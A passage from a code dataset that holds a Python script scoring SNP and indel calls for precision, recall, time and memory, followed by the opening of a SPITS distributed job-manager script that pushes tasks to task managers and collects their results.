"usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 100, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 110, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 118, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 119, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 119, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 120, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 133, "usage_type": "argument"}, {"api_name": "characters.mixins.NoAvailableCharactersMixin", "line_number": 134, "usage_type": "argument"}, {"api_name": "world.mixins.LocationFromRequestMixin", "line_number": 135, "usage_type": "argument"}, {"api_name": "braces.views.LoginRequiredMixin", "line_number": 136, "usage_type": "argument"}, {"api_name": "django.forms.CharField", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 142, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 145, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 149, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 150, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 158, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 172, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 165, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 165, "usage_type": "name"}, {"api_name": "quests.models.Quest", "line_number": 184, "usage_type": "call"}, {"api_name": "quests.models.Post.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 194, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 209, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects.get", "line_number": 216, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 216, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 216, "usage_type": "name"}, {"api_name": "quests.models.Post.objects.get", "line_number": 221, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 221, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "quests.models.Quest.objects.create", "line_number": 241, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 241, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 241, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 244, "usage_type": "call"}]}
+{"seq_id": "468508638", "text": "import os\nimport sys\nimport json\nfrom datetime import datetime\n\nconfig_file = open(sys.argv[1])\ndata = json.load(config_file)\nconfig_file.close()\n\nprog_version = data[\"ProgVer\"]\nprog_path = data[\"ProgPath\"]\ndata_dir = data[\"DataPath\"][\"DataDir\"]\nref_dir = data[\"DataPath\"][\"RefDir\"]\ngenome_fn = data[\"DataPath\"][\"GenomeFile\"]\nsnp_fn = data[\"DataPath\"][\"SNPProfFile\"]\nread_dir = data[\"DataPath\"][\"ReadDir\"]\nindex_dir = data[\"DataPath\"][\"IndexDir\"]\nresult_dir = data[\"DataPath\"][\"ResultDir\"]\nread_fn = data[\"DataPath\"][\"ReadPrefixFile\"]\n\nconfi = float(sys.argv[2])\ncpu_num = sys.argv[3]\ncov_num = sys.argv[4]\nresult_dn = sys.argv[5]\n\nref_path = os.path.join(data_dir, ref_dir)\nread_path = os.path.join(data_dir, read_dir)\n\ngenome_file = os.path.join(ref_path, genome_fn)\nsnp_file = os.path.join(ref_path, snp_fn)\n\nref_len = 249250621\nref_para = ['0.70', '0.75', '0.80', '0.85', '0.90', '0.95', '0.96', '0.97', '0.98', '0.99']\nread_lens = [100]\nseq_errs = ['0.00015-0.0015']\nmax_snum = [2**i for i in range(3, 14)]\nread_nums = []\nif cov_num == \"all\":\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25]]\nelse:\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [int(cov_num)]]\n\nfor para in ref_para[0:1]:\n\n true_snp_comp, true_indel_comp, true_snp_none, true_indel_none = {}, {}, {}, {}\n variant_comp_file = os.path.join(ref_path, \"variant_comp_\" + para + \".txt\")\n variant_none_file = os.path.join(ref_path, \"variant_none_\" + para + \".txt\")\n\n with open(variant_comp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_comp[int(value[0])] = value[1]\n else:\n true_indel_comp[int(value[0])] = value[1]\n\n with open(variant_none_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_none[int(value[0])] = value[1]\n else:\n true_indel_none[int(value[0])] = value[1]\n\n KAKS, NS = len(true_snp_comp), len(true_snp_none)\n KAKID, NID = len(true_indel_comp), len(true_indel_none)\n\n result_path = os.path.join(data_dir, result_dir, \"isc_\" + para, result_dn)\n result_file_path = result_path + \"/\" + read_fn + \"_\" + str(read_lens[0]) + \".\" + str(seq_errs[0]) + \".prec-rec-time-mem.\" + str(confi) + \".all-pos.txt\"\n result_file = open(result_file_path, \"w\")\n\n header = [\"Alg\", \"cov\", \"qual\", \\\n \"S\", \"P-S\", \"R-S\", \"FP\", \"TP\", \"FP-S@Other\", \"P-S@None\", \"R-S@None\", \"P-S@Comp\", \"R-S@Comp\", \\\n \"I\", \"P-I\", \"R-I\", \"FP-I@Other\", \"P-I@None\", \"R-I@None\", \"P-I@Comp\", \"R-I@Comp\", \\\n \"S@None\", \"TP-S@None\", \"FP-S@None\", \"S@Comp\", \"TP-S@Comp\", \"FP-S@Comp\", \\\n \"I@None\", \"TP-I@None\", \"FP-I@None\", \"I@Comp\", \"TP-I@Comp\", \"FP-I@Comp\", \\\n \"run\", \"read\", \"proc\", \"max_snum\", \"max_ps_num\", \"na_num\", \"na_ratio\", \\\n \"timeI\", \"memI\", \"timeC\", \"memC\", \"input_para\", \"para\"]\n\n result_file.write(\"\\t\".join(header))\n result_file.write(\"\\n\")\n\n for rl in read_lens:\n for err in seq_errs:\n for rn in read_nums:\n for ms in max_snum[6:7]:\n prefix_fn = read_fn + \"_\" + str(rl) + \".\" + str(err) + \".\" + str(rn) + \".\" + str(ms)\n called_snp_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".vcf\")\n snp = {}\n with open(called_snp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[2]) >= 1 and float(value[2]) >= confi:\n snp[int(value[0]) - 1] = value[1]\n\n result_file.write(\"\\t\".join([prog_version, \"%.0f\" % (2.0*int(rn)*int(rl)/ref_len), str(confi)]) + \"\\t\")\n\n TP_KAKS, TP_NS = 0, 0\n FP_KAKS, FP_NS = 0, 0\n TP_KAKID, TP_NID = 0, 0\n FP_KAKID, FP_NID = 0, 0\n FP_S, FP_ID = 0, 0\n for key, value in snp.iteritems():\n if key in true_snp_comp or key in true_indel_comp:\n if key in true_snp_comp:\n if value == true_snp_comp[key]:\n TP_KAKS += 1\n else:\n FP_KAKS += 1\n elif key in true_indel_comp:\n if value == true_indel_comp[key]:\n TP_KAKID += 1\n else:\n FP_KAKID += 1\n elif key in true_snp_none or key in true_indel_none:\n if key in true_snp_none:\n if value == true_snp_none[key]:\n TP_NS += 1\n else:\n FP_NS += 1\n elif key in true_indel_none:\n if value == true_indel_none[key]:\n TP_NID += 1\n else:\n FP_NID += 1\n else:\n if len(value) == 1:\n FP_S += 1\n else:\n FP_ID += 1\n\n result_file.write(str(KAKS + NS) + \"\\t\")\n if TP_KAKS + FP_KAKS + TP_NS + FP_NS + FP_S != 0 and KAKS + NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(TP_KAKS + TP_NS + FP_KAKS + FP_NS + FP_S)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(KAKS + NS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(\"%.5d\\t\" % (FP_KAKS + FP_NS + FP_S))\n result_file.write(\"%.5d\\t\" % (TP_KAKS + TP_NS))\n\n result_file.write(str(FP_S) + \"\\t\")\n if TP_NS + FP_NS != 0 and NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(TP_NS + FP_NS)))\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(NS)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKS + FP_KAKS != 0 and KAKS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(TP_KAKS + FP_KAKS)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(KAKS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(KAKID + NID) + \"\\t\")\n if TP_KAKID + FP_KAKID + TP_NID + FP_NID + FP_ID != 0 and KAKID + NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(TP_KAKID + TP_NID + FP_KAKID + FP_NID + FP_ID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(KAKID + NID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(FP_ID) + \"\\t\")\n if TP_NID + FP_NID != 0 and NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(TP_NID + FP_NID)))\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(NID)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKID + FP_KAKID != 0 and KAKID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(TP_KAKID + FP_KAKID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(KAKID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(NS) + \"\\t\" + str(TP_NS) + \"\\t\" + str(FP_NS) + \"\\t\")\n result_file.write(str(KAKS) + \"\\t\" + str(TP_KAKS) + \"\\t\" + str(FP_KAKS) + \"\\t\")\n\n result_file.write(str(NID) + \"\\t\" + str(TP_NID) + \"\\t\" + str(FP_NID) + \"\\t\")\n result_file.write(str(KAKID) + \"\\t\" + str(TP_KAKID) + \"\\t\" + str(FP_KAKID) + \"\\t\")\n\n result_file.write(result_dn + \"\\t\" + prefix_fn + \"\\t\" + cpu_num + \"\\t\" + str(ms) + \"\\t1\\t\")\n\n mem_time_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".log\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"# of no-aligned reads\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(str((1-float(tokens[1]))/rn) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"time for initializing SNP caller\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after initializing SNP caller\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n if \"time for calling SNPs\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after calling SNPs\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"Input parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"Parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(\"\\n\")\n\nresult_file.close()\n", "sub_path": "ivc-tools/old-test-scripts/0.5-test-scripts/isc-test-dwgsim-eval-all-pos.py", "file_name": "isc-test-dwgsim-eval-all-pos.py", "file_ext": "py", "file_size_in_byte": 10449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}]}
+{"seq_id": "540922159", "text": "#!/usr/bin/env python\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2015 Caian Benedicto \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom libspitz import JobBinary, SimpleEndpoint\nfrom libspitz import messaging, config\nfrom libspitz import memstat\nfrom libspitz import make_uid\nfrom libspitz import log_lines\n\nfrom libspitz import PerfModule\n\nimport Args\nimport sys, threading, os, time, logging, struct, traceback\n\n# Global configuration parameters\njm_killtms = None # Kill task managers after execution\njm_log_file = None # Output file for logging\njm_verbosity = None # Verbosity level for logging\njm_heart_timeout = None # Timeout for heartbeat response\njm_conn_timeout = None # Socket connect timeout\njm_recv_timeout = None # Socket receive timeout\njm_send_timeout = None # Socket send timeout\njm_send_backoff = None # Job Manager delay between sending tasks\njm_recv_backoff = None # Job Manager delay between sending tasks\njm_memstat = None # 1 to display memory statistics\njm_profiling = None # 1 to enable profiling\njm_perf_rinterv = None # Profiling report interval (seconds)\njm_perf_subsamp = None # Number of samples collected between report intervals\njm_heartbeat_interval = None\njm_jobid = None\n\n###############################################################################\n# Parse global configuration\n###############################################################################\ndef parse_global_config(argdict):\n global jm_killtms, jm_log_file, jm_verbosity, jm_heart_timeout, \\\n jm_conn_timeout, jm_recv_timeout, jm_send_timeout, jm_send_backoff, \\\n jm_recv_backoff, jm_memstat, jm_profiling, jm_perf_rinterv, \\\n jm_perf_subsamp, jm_heartbeat_interval, jm_jobid\n\n def as_int(v):\n if v == None:\n return None\n return int(v)\n\n def as_float(v):\n if v == None:\n return None\n return int(v)\n\n def as_bool(v):\n if v == None:\n return None\n return bool(v)\n\n jm_killtms = as_bool(argdict.get('killtms', True))\n jm_log_file = argdict.get('log', None)\n jm_verbosity = as_int(argdict.get('verbose', logging.INFO // 10)) * 10\n jm_heart_timeout = as_float(argdict.get('htimeout', config.heart_timeout))\n jm_conn_timeout = as_float(argdict.get('ctimeout', config.conn_timeout))\n jm_recv_timeout = as_float(argdict.get('rtimeout', config.recv_timeout))\n jm_send_timeout = as_float(argdict.get('stimeout', config.send_timeout))\n jm_recv_backoff = as_float(argdict.get('rbackoff', config.recv_backoff))\n jm_send_backoff = as_float(argdict.get('sbackoff', config.send_backoff))\n jm_memstat = as_int(argdict.get('memstat', 0))\n jm_profiling = as_int(argdict.get('profiling', 0))\n jm_perf_rinterv = as_int(argdict.get('rinterv', 60))\n jm_perf_subsamp = as_int(argdict.get('subsamp', 12))\n jm_heartbeat_interval = as_float(argdict.get('heartbeat-interval', 10))\n jm_jobid = argdict.get('jobid', '')\n\n###############################################################################\n# Configure the log output format\n###############################################################################\ndef setup_log():\n root = logging.getLogger()\n root.setLevel(jm_verbosity)\n root.handlers = []\n if jm_log_file == None:\n ch = logging.StreamHandler(sys.stderr)\n else:\n ch = logging.StreamHandler(open(jm_log_file, 'wt'))\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(threadName)s - '+\n '%(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n###############################################################################\n# Abort the aplication with message\n###############################################################################\ndef abort(error):\n logging.critical(error)\n exit(1)\n\n###############################################################################\n# Parse the definition of a proxy\n###############################################################################\ndef parse_proxy(cmd):\n cmd = cmd.split()\n\n if len(cmd) != 3:\n raise Exception()\n\n logging.debug('Proxy %s.' % (cmd[1]))\n\n name = cmd[1]\n gate = cmd[2].split(':')\n prot = gate[0]\n addr = gate[1]\n port = int(gate[2])\n\n return (name, { 'protocol' : prot, 'address' : addr, 'port' : port })\n\n###############################################################################\n# Parse the definition of a compute node\n###############################################################################\ndef parse_node(cmd, proxies):\n cmd = cmd.split()\n\n if len(cmd) < 2:\n raise Exception()\n\n logging.debug('Node %s.' % (cmd[1]))\n\n name = cmd[1]\n host = name.split(':')\n addr = host[0]\n port = int(host[1])\n\n # Simple endpoint\n if len(cmd) == 2:\n return (name, SimpleEndpoint(addr, port))\n\n # Endpoint behind a proxy\n elif len(cmd) == 4:\n if cmd[2] != 'through':\n raise Exception()\n\n proxy = proxies.get(cmd[3], None)\n if proxy == None:\n raise Exception()\n\n # Proxies are not supported yet...\n logging.info('Node %s is behind a proxy and will be ignored.' %\n (cmd[1]))\n return None\n\n # Unknow command format\n raise Exception()\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list_from_file(filename = None):\n # Override the filename if it is empty\n if filename == None:\n nodefile = 'nodes.txt'\n filename = os.path.join('.', nodefile)\n\n logging.debug('Loading task manager list from %s...' % (filename,))\n\n # Read all lines\n try:\n with open(filename, 'rt') as file:\n lines = file.readlines()\n except:\n logging.warning('Error loading the list of task managers from file!')\n return {}\n\n lproxies = [parse_proxy(x.strip()) for x in lines if x[0:5] == 'proxy']\n proxies = {}\n\n for p in lproxies:\n if p != None:\n proxies[p[0]] = p[1]\n\n ltms = [parse_node(x.strip(), proxies) for x in lines if x[0:4] == 'node']\n tms = {}\n for t in ltms:\n if t != None:\n tms[t[0]] = t[1]\n\n return tms\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list_from_dir(dirname = None):\n # Override the dirname if it is empty\n if dirname == None:\n dirname = 'nodes'\n\n logging.debug('Loading task manager list from %s...' % (dirname,))\n\n tms = {}\n\n # Read all files\n try:\n for f in os.listdir(dirname):\n f = os.path.join(dirname, f)\n if not os.path.isfile(f):\n continue\n tms.update(load_tm_list_from_file(f))\n except:\n logging.warning('Error loading the list of task ' +\n 'managers from directory!')\n return {}\n\n return tms\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list():\n tms = load_tm_list_from_file()\n tms.update(load_tm_list_from_dir())\n logging.debug('Loaded %d task managers.' % (len(tms),))\n return tms\n\n###############################################################################\n# Exchange messages with an endpoint to begin pushing tasks\n###############################################################################\ndef setup_endpoint_for_pushing(e):\n try:\n # Try to connect to a task manager\n e.Open(jm_conn_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n e.Close()\n return\n try:\n # Send the job identifier\n e.WriteString(jm_jobid)\n\n # Ask if it is possible to send tasks\n e.WriteInt64(messaging.msg_send_task)\n\n # Verify job id of the answer\n jobid = e.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n e.address, e.port, jm_jobid, jobid)\n e.Close()\n return False\n\n # Wait for a response\n response = e.ReadInt64(jm_recv_timeout)\n\n if response == messaging.msg_send_full:\n # Task mananger is full\n logging.debug('Task manager at %s:%d is full.',\n e.address, e.port)\n\n elif response == messaging.msg_send_more:\n # Continue to the task pushing loop\n return True\n\n else:\n # The task manager is not replying as expected\n logging.error('Unknown response from the task manager!')\n\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n e.Close()\n return False\n\n###############################################################################\n# Exchange messages with an endpoint to begin reading results\n###############################################################################\ndef setup_endpoint_for_pulling(e):\n try:\n # Try to connect to a task manager\n e.Open(jm_conn_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n e.Close()\n return\n try:\n # Send the job identifier\n e.WriteString(jm_jobid)\n\n # Ask if it is possible to send tasks\n e.WriteInt64(messaging.msg_read_result)\n\n # Verify job id of the answer\n jobid = e.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n e.address, e.port, jm_jobid, jobid)\n e.Close()\n return False\n\n return True\n\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n e.Close()\n return False\n\n###############################################################################\n# Push tasks while the task manager is not full\n###############################################################################\ndef push_tasks(job, runid, jm, tm, taskid, task, tasklist, completed):\n # Keep pushing until finished or the task manager is full\n sent = []\n while True:\n if task == None:\n\n # Avoid calling next_task after it's finished\n if completed:\n logging.debug('There are no new tasks to generate.')\n return (True, 0, None, sent)\n\n # Only get a task if the last one was already sent\n newtaskid = taskid + 1\n r1, newtask, ctx = job.spits_job_manager_next_task(jm, newtaskid)\n\n # Exit if done\n if r1 == 0:\n return (True, 0, None, sent)\n\n if newtask == None:\n logging.error('Task %d was not pushed!', newtaskid)\n return (False, taskid, task, sent)\n\n if ctx != newtaskid:\n logging.error('Context verification failed for task %d!',\n newtaskid)\n return (False, taskid, task, sent)\n\n # Add the generated task to the tasklist\n taskid = newtaskid\n task = newtask[0]\n tasklist[taskid] = (0, task)\n\n logging.debug('Generated task %d with payload size of %d bytes.',\n taskid, len(task) if task != None else 0)\n\n try:\n logging.debug('Pushing %d...', taskid)\n\n # Push the task to the active task manager\n tm.WriteInt64(taskid)\n tm.WriteInt64(runid)\n if task == None:\n tm.WriteInt64(0)\n else:\n tm.WriteInt64(len(task))\n tm.Write(task)\n\n # Wait for a response\n response = tm.ReadInt64(jm_recv_timeout)\n\n if response == messaging.msg_send_full:\n # Task was sent, but the task manager is now full\n sent.append((taskid, task))\n task = None\n break\n\n elif response == messaging.msg_send_more:\n # Continue pushing tasks\n sent.append((taskid, task))\n task = None\n pass\n\n elif response == messaging.msg_send_rjct:\n # Task was rejected by the task manager, this is not\n # predicted for a model where just one task manager\n # pushes tasks, exit the task loop\n logging.warning('Task manager at %s:%d rejected task %d',\n tm.address, tm.port, taskid)\n break\n\n else:\n # The task manager is not replying as expected\n logging.error('Unknown response from the task manager!')\n break\n except:\n # Something went wrong with the connection,\n # try with another task manager\n logging.error('Error pushing tasks to task manager!')\n log_lines(traceback.format_exc(), logging.debug)\n break\n\n return (False, taskid, task, sent)\n\n###############################################################################\n# Read and commit tasks while the task manager is not empty\n###############################################################################\ndef commit_tasks(job, runid, co, tm, tasklist, completed):\n # Keep pulling until finished or the task manager is full\n n_errors = 0\n while True:\n try:\n # Pull the task from the active task manager\n taskid = tm.ReadInt64(jm_recv_timeout)\n\n if taskid == messaging.msg_read_empty:\n # No more task to receive\n return\n\n # Read the run id\n taskrunid = tm.ReadInt64(jm_recv_timeout)\n\n # Read the rest of the task\n r = tm.ReadInt64(jm_recv_timeout)\n ressz = tm.ReadInt64(jm_recv_timeout)\n res = tm.Read(ressz, jm_recv_timeout)\n\n # Tell the task manager that the task was received\n tm.WriteInt64(messaging.msg_read_result)\n\n # Warning, exceptions after this line may cause task loss\n # if not handled properly!!\n\n if r != 0:\n n_errors += 1\n if r == messaging.res_module_error:\n logging.error('The remote worker crashed while ' +\n 'executing task %d!', r)\n else:\n logging.error('The task %d was not successfully executed, ' +\n 'worker returned %d!', taskid, r)\n\n if taskrunid < runid:\n logging.debug('The task %d is from the previous run %d ' +\n 'and will be ignored!', taskid, taskrunid)\n continue\n\n if taskrunid > runid:\n logging.error('Received task %d from a future run %d!',\n taskid, taskrunid)\n continue\n\n # Validated completed task\n\n c = completed.get(taskid, (None, None))\n if c[0] != None:\n # This may happen with the fault tolerance system. This may\n # lead to tasks being put in the tasklist by the job manager\n # while being committed. The tasklist must be constantly\n # sanitized.\n logging.warning('The task %d was received more than once ' +\n 'and will not be committed again!',\n taskid)\n # Removed the completed task from the tasklist\n tasklist.pop(taskid, (None, None))\n continue\n\n # Remove it from the tasklist\n\n p = tasklist.pop(taskid, (None, None))\n if p[0] == None and c[0] == None:\n # The task was not already completed and was not scheduled\n # to be executed, this is serious problem!\n logging.error('The task %d was not in the working list!',\n taskid)\n\n r2 = job.spits_committer_commit_pit(co, res)\n\n if r2 != 0:\n logging.error('The task %d was not successfully committed, ' +\n 'committer returned %d', taskid, r2)\n\n # Add completed task to list\n completed[taskid] = (r, r2)\n\n except:\n # Something went wrong with the connection,\n # try with another task manager\n break\n if n_errors > 0:\n logging.warn('There were %d failed tasks' % (n_errors, ))\n\n\ndef infinite_tmlist_generator():\n ''' Iterates over TMs returned by the load_tm_list() method indefinitely.\n The result of a single iteration is a tuple containing (Finished, Name,\n TM), where Finished == True indicates if the currently listed TMs\n finished. The next iteration will read the TMs again, setting Finished to\n False.\n\n Conditions:\n Finished == True <=> (Name, TM) == (None, None)\n Finished == False <=> (Name, TM) != (None, None)\n\n Example:\n for isEnd, name, tm in infinite_tmlist_generator():\n if not isEnd:\n do something with the task manager (name, tm)\n else:\n all tms where processed, you can do post processing here. The\n next iteration will set isEnd to True and start over again'''\n tmlist = load_tm_list()\n while True:\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n if len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n for name, tm in tmlist.items():\n yield False, name, tm\n yield True, None, None\n\n\n###############################################################################\n# Heartbeat routine\n###############################################################################\ndef heartbeat(finished):\n global jm_heartbeat_interval\n t_last = time.clock()\n for isEnd, name, tm in infinite_tmlist_generator():\n if finished[0]:\n logging.debug('Stopping heartbeat thread...')\n return\n if isEnd:\n t_curr = time.clock()\n elapsed = t_curr - t_last\n t_last = t_curr\n sleep_for = max(jm_heartbeat_interval - elapsed, 0)\n time.sleep(sleep_for)\n else:\n try:\n tm.Open(jm_heart_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n tm.Close()\n continue\n try:\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Verify job id of the answer\n jobid = tm.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n tm.address, tm.port, jm_jobid, jobid)\n tm.Close()\n continue\n\n # Send the heartbeat\n tm.WriteInt64(messaging.msg_send_heart)\n except:\n logging.warning('Error connecting to task manager at %s:%d!',\n 